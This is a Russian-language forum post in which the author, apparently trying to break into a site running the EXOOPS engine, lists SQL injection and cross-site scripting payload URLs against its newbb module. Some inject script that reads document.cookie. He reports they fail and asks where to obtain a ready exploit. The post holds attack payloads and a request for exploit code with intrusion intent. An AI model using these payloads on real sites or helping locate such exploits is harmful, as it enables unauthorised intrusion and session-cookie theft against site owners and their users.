Я извеняюсь может я залез не в тему, но это единственный раздел который мне кажется ближе к теме. Есть такой движок сайта как EXOOPS. но я не могу н-ти в нем дырку. Все, что я нашел так это только:
http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/ind...id=9%2c+9%2c+9

Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
http://[target]/modules/newbb/viewforum.php?
sortname=p.post_time&sortorder=ASC&
sortdays=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script %
3E&forum=25&refresh=Vai

http://[target]/modules/newbb/index.php?
viewcat=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E

Но запросы он игнорирует. Кстати я слышал, что есть эксплойт для данного движка, но я не смог его найти. Не подскажите где его можно взять.